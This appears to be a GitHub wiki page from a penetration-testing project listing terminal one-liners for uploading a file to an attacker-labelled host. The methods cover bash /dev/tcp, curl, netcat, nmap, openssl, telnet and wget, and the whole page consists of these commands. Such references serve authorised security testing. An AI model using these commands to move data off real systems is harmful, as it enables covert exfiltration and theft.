UL_ _Lin_ _Terminal - lighthouseitsecurity/barabbas GitHub Wiki

File Upload ➔ Linux ➔ Terminal

OVERVIEW:

(identify supported options - Linux - file upload - terminal)

tools=("bash" "curl" "nc" "nc.traditional" "nmap" "openssl" "*telnet" "wget"); echo '[*] teminal - file upload - available options'; for tool in ${tools[@]}; do echo "   [*] $tool"; find /etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt -type f -executable -name "$tool" 2>/dev/null; echo ''; done

bash (HTTP)

https://www.gnu.org/software/bash/

TESTED ON: Kali 2023.2

NOTE: uses HTTP PUT

  • base64-encoding target file, due to bash issues (null byte transmission)

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export LFILE=testfile_200MB;

3. [CLIENT] base64-encode target file

cat $PWD/$LFILE | base64 -w0 > $PWD/${LFILE}.b64;

4. [CLIENT] upload base64-encoded file

echo "[*] LOCAL MD5 (CLIENT): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)"; bash -c '{ echo -ne "PUT $ATT_PATH${LFILE}.b64 HTTP/1.1\r\nHost: $ATT_HOST:$ATT_PORT\r\nConnection: close\r\nContent-Length: $(stat -c '%s' ${LFILE}.b64)\r\n\r\n$(<${LFILE}.b64)" 1>&3; cat 0<&3; } 3<>/dev/tcp/$ATT_HOST/$ATT_PORT'; rm $PWD/${LFILE}.b64;

5. [SERVER] base64-decode file

export LFILE=testfile_200MB; cat $PWD/${LFILE}.b64 | base64 -d > $PWD/$LFILE; rm $PWD/${LFILE}.b64; echo "[*] LOCAL MD5 (SERVER): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)";

curl (HTTP; HTTPS)

https://linux.die.net/man/1/curl

TESTED ON: Kali 2023.2

(HTTP PUT - HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export LFILE=testfile_200MB;

3. [CLIENT] upload file

echo "[*] LOCAL MD5 (CLIENT): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)"; res=$(curl http://$ATT_HOST:$ATT_PORT$ATT_PATH --upload-file $PWD/$LFILE); echo "[*] REMOTE MD5 (SERVER): $res";

(HTTP PUT - HTTPS)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export LFILE=testfile_200MB;

3. [CLIENT] upload file

echo "[*] LOCAL MD5 (CLIENT): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)"; res=$(curl -k https://$ATT_HOST:$ATT_PORT$ATT_PATH --upload-file $PWD/$LFILE); echo "[*] REMOTE MD5 (SERVER): $res";

(HTTP POST - HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export LFILE=testfile_200MB;

3. [CLIENT] upload file

echo "[*] LOCAL MD5 (CLIENT): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)"; res=$(curl http://$ATT_HOST:$ATT_PORT$ATT_PATH -F "file=@$LFILE"); echo "[*] REMOTE MD5 (SERVER): $(echo $res | sed -n 's/^.*(MD5 \(\S*\)).*$/\1/p')";

(HTTP POST - HTTPS)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export LFILE=testfile_200MB;

3. [CLIENT] upload file

echo "[*] LOCAL MD5 (CLIENT): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)"; res=$(curl -k https://$ATT_HOST:$ATT_PORT$ATT_PATH -F "file=@$LFILE"); echo "[*] REMOTE MD5 (SERVER): $(echo $res | sed -n 's/^.*(MD5 \(\S*\)).*$/\1/p')";

nc/nc.traditional (HTTP)

https://linux.die.net/man/1/nc

TESTED ON: Kali 2023.2

NOTE: uses HTTP PUT

  • base64-encoding target file, due to bash issues (null byte transmission)

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export LFILE=testfile_200MB;

3. [CLIENT] base64-encode target file

cat $PWD/$LFILE | base64 -w0 > $PWD/${LFILE}.b64;

4. [CLIENT] upload base64-encoded file

(nc)

echo "[*] LOCAL MD5 (CLIENT): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)"; echo -e "PUT $ATT_PATH${LFILE}.b64 HTTP/1.1\r\nHost: $ATT_HOST:$ATT_PORT\r\nConnection: close\r\nContent-Length: $(stat -c '%s' ${LFILE}.b64)\r\n\r\n$(<${LFILE}.b64)" | nc $ATT_HOST $ATT_PORT; rm $PWD/${LFILE}.b64;

(nc.traditional)

echo "[*] LOCAL MD5 (CLIENT): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)"; echo -e "PUT $ATT_PATH${LFILE}.b64 HTTP/1.1\r\nHost: $ATT_HOST:$ATT_PORT\r\nConnection: close\r\nContent-Length: $(stat -c '%s' ${LFILE}.b64)\r\n\r\n$(<${LFILE}.b64)" | nc.traditional $ATT_HOST $ATT_PORT; rm $PWD/${LFILE}.b64;

5. [SERVER] base64-decode file

export LFILE=testfile_200MB; cat $PWD/${LFILE}.b64 | base64 -d > $PWD/$LFILE; rm $PWD/${LFILE}.b64; echo "[*] LOCAL MD5 (SERVER): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)";

nmap (HTTP/HTTPS)

https://linux.die.net/man/1/nmap

TESTED ON: Kali 2023.2

NOTE: uses HTTP PUT

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export LFILE=testfile_200MB;

3. [CLIENT] upload file

echo "[*] LOCAL MD5 (CLIENT): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)"; nmap -p $ATT_PORT $ATT_HOST --script http-put --script-args http-put.url="$ATT_PATH$LFILE",http-put.file="$LFILE";

(HTTPS)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export LFILE=testfile_200MB;

3. [CLIENT] upload file

echo "[*] LOCAL MD5 (CLIENT): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)"; nmap -p $ATT_PORT $ATT_HOST --script http-put --script-args http-put.url="$ATT_PATH$LFILE",http-put.file="$LFILE";

NOTE: works with self-signed X.509 certificates

openssl (HTTPS)

https://linux.die.net/man/1/openssl

TESTED ON: Kali 2023.2

NOTE: uses HTTP PUT

  • base64-encoding target file, due to bash issues (null byte transmission)

(HTTPS)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export LFILE=testfile_200MB;

3. [CLIENT] base64-encode target file

cat $PWD/$LFILE | base64 -w0 > $PWD/${LFILE}.b64;

4. [CLIENT] upload base64-encoded file

echo "[*] LOCAL MD5 (CLIENT): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)"; echo -ne "PUT $ATT_PATH${LFILE}.b64 HTTP/1.1\r\nHost: $ATT_HOST:$ATT_PORT\r\nConnection: close\r\nContent-Length: $(stat -c '%s' ${LFILE}.b64)\r\n\r\n$(<${LFILE}.b64)" | openssl s_client -quiet -connect $ATT_HOST:$ATT_PORT; rm $PWD/${LFILE}.b64;

NOTES:

  • works with self-signed X.509 certificates
  • upon upload, an error will appear in stdout, which can be ignored (i.e. file successfully uploaded)

5. [SERVER] base64-decode file

export LFILE=testfile_200MB; cat $PWD/${LFILE}.b64 | base64 -d > $PWD/$LFILE; rm $PWD/${LFILE}.b64; echo "[*] LOCAL MD5 (SERVER): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)";

telnet (HTTP)

https://linux.die.net/man/1/telnet

TESTED ON: Kali 2023.2

NOTES:

  • uses HTTP PUT
    • base64-encoding target file, due to bash issues (null byte transmission)
  • adjust sleep timers, if needed (depending on environment and file size)

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export LFILE=testfile_200MB;

3. [CLIENT] base64-encode target file

cat $PWD/$LFILE | base64 -w0 > $PWD/${LFILE}.b64;

4. [CLIENT] upload base64-encoded file

echo "[*] LOCAL MD5 (CLIENT): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)"; { sleep 3; echo -e "PUT $ATT_PATH${LFILE}.b64 HTTP/1.1\nHost: $ATT_HOST:$ATT_PORT\nConnection: close\nContent-Length: $(stat -c '%s' ${LFILE}.b64)\n\n$(<${LFILE}.b64)"; sleep 3 } | telnet $ATT_HOST $ATT_PORT; rm $PWD/${LFILE}.b64;

5. [SERVER] base64-decode file

export LFILE=testfile_200MB; cat $PWD/${LFILE}.b64 | base64 -d > $PWD/$LFILE; rm $PWD/${LFILE}.b64; echo "[*] LOCAL MD5 (SERVER): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)";

wget (HTTP; HTTPS)

https://linux.die.net/man/1/wget

TESTED ON: Kali 2023.2

NOTE: existing options for file upload (--post-file, --body-file) use unsupported upload technique (application/x-www-form-urlencoded)

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=80;
export ATT_PATH=/;
export LFILE=testfile_200MB;

3. [CLIENT] upload file

echo "[*] LOCAL MD5 (CLIENT): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)"; marker=$(tr -dc a-f0-9 </dev/urandom | head -c 32); echo -e '--------------------------'$marker'\nContent-Disposition: form-data; name="file"; filename="'$LFILE'"\nContent-Type: application/octet-stream\n' > /tmp/temp_file_wget; cat $PWD/$LFILE >> /tmp/temp_file_wget; echo -e "\n--------------------------$marker--" >> /tmp/temp_file_wget; res=$(wget -qO- --header="Content-type: multipart/form-data boundary=$marker" --post-file /tmp/temp_file_wget http://$ATT_HOST:$ATT_PORT$ATT_PATH); echo "[*] REMOTE MD5 (SERVER): $(echo $res | sed -n 's/^.*(MD5 \(\S*\)).*$/\1/p')"; rm /tmp/temp_file_wget;

(HTTPS)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

export ATT_HOST=192.168.5.11;
export ATT_PORT=443;
export ATT_PATH=/;
export LFILE=testfile_200MB;

3. [CLIENT] upload file

echo "[*] LOCAL MD5 (CLIENT): $(md5sum $PWD/$LFILE | cut -d ' ' -f1)"; marker=$(tr -dc a-f0-9 </dev/urandom | head -c 32); echo -e '--------------------------'$marker'\nContent-Disposition: form-data; name="file"; filename="'$LFILE'"\nContent-Type: application/octet-stream\n' > /tmp/temp_file_wget; cat $PWD/$LFILE >> /tmp/temp_file_wget; echo -e "\n--------------------------$marker--" >> /tmp/temp_file_wget; res=$(wget -qO- --header="Content-type: multipart/form-data boundary=$marker" --post-file /tmp/temp_file_wget --no-check-certificate https://$ATT_HOST:$ATT_PORT$ATT_PATH); echo "[*] REMOTE MD5 (SERVER): $(echo $res | sed -n 's/^.*(MD5 \(\S*\)).*$/\1/p')"; rm /tmp/temp_file_wget;
⚠️ **GitHub.com Fallback** ⚠️